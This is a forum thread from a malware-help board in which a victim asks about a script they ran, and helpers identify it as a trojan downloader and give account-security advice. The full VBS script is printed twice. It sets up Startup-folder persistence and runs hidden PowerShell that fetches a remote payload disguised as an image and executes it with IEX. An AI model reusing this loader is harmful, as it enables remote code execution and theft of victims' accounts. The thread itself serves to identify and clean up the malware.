Jump to content

What is this virus and how can i go about cleaning?

NotMikaa

By NotMikaa
in Malware Finding and Cleaning

 Share

Recommended Posts

NotMikaa

NotMikaa 0

Posted
Posted

Hi!

So i came about this being dumb and installed it.
Didn't think anything of it at first until i noticed out of the corner of my eye that team viewer was  opened and they were attempting to go into my gmail.
They've already looked into my paypal.

  

dim s15001
const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true
set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT

 

Link to comment
Share on other sites
  • Administrators
Marcos

Marcos 5,074

Posted
  • Administrators
Posted

A detection was added several days ago, the script is detected as VBS/TrojanDownloader.Agent.SGV trojan. When the malware is detected, it should be cleaned without issues since it's a simple VB downloader script.

Link to comment
Share on other sites
  • Most Valued Members
Nightowl

Nightowl 202

Posted
  • Most Valued Members
Posted (edited)
On 12/1/2019 at 7:58 AM, NotMikaa said:

Hi!

So i came about this being dumb and installed it.
Didn't think anything of it at first until i noticed out of the corner of my eye that team viewer was  opened and they were attempting to go into my gmail.
They've already looked into my paypal.

  


dim s15001
const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true
set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT

 

You should secure your TeamViewer/AnyDesk or whatever your remote desktop software is

Put a good password and limit access only to your PCs.

Because they have got access to several accounts of yours , you should change all passwords now , and secure them with 2-step verification for more secure entry to your accounts.

Edited by Rami
Link to comment
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...